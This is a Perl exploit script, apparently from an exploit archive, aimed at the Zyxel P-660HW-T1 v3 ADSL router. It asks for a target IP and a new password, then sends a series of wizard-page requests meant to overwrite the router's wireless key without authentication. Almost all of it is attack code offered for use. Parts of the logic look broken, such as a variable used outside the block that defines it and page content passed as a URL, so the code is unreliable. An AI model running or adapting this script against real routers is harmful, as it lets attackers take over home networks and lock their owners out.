#!/usr/bin/perl
###########################################################
# Title : Zyxel P-660HW-TI V3 ADSL CSRF ( change password )
# Author : dr-iman/GIST
# Exploit Type : Perl/Remote
# Date : 3 Feb 2018
# Vendor : https://www.zyxel.com/support/DownloadLandingSR.shtml?c=gb&l=en&kbid=MD08229&md=P-660HW-T1%20v3
# Tested : Ubuntu - Windows 10
# GIST : c0d3!nj3ct!0n , REX , 0r0b4s , Mownten , AliZombie , MR.Python , Phoen1X
###########################################################
# Zyxel P-660HW-T1 v3 Wireless ADSL Have CSRF Vuln.We can Remotly Change Password Wireless.
# The reason for this vulnerability Is After entering the address (change the password) System Will Not Checked Te Password Field
# Items needed : Wirelesss ADSL IP , NeW Password
# There Is 3 Update For This ADSL Router . All versions are vulnerable
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);
use IO::Socket;
my $ua = LWP::UserAgent->new;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print <<logo;
_____ _ _____ _ _ _
|__ |_ _ _ _ ___| | | __|_ _ ___| |___|_| |_ ___ ___
| __| | |_'_| -_| | | __|_'_| . | | . | | _| -_| _|
|_____|_ |_,_|___|_| |_____|_,_| _|_|___|_|_| |___|_|
|___| |_|
logo
print "\nEner IP Address : ";
$ip=<>;
chomp($ip);
print "\nEnter New Passwword : ";
$pass=<>;
chomp($pass);
$url = "$ip/wzPPP.html";
my $content = $ua->get("$url")->content;
if ($content =~ /Internet Configuration/ )
{
my $wan = $ua->post($url, Content => [ 'next >' => 'submit',]);
}
my $content = $ua->get("$wan")->content;
my $wan2 = $ua->post($content, Content => [ 'wzEnableWLAN' => 'WLANACtive', 'next >' => 'submit',]);
my $content = $ua->get("$wan2")->content;
my $lan = $ua->post($content, Content => [ 'wzWLANCfgHPSK' => $pass, 'next >' => 'submit',]);
my $content = $ua->get("$lan")->content;
my $fin = $ua->post($content, Content => [ 'Apply' => 'submit',]);
if ($fin =~ /Congratulations/)
{
print "\nPassword Changed Successfully !\n";
}
else{
print "\nProcess Failed !!\n";
}
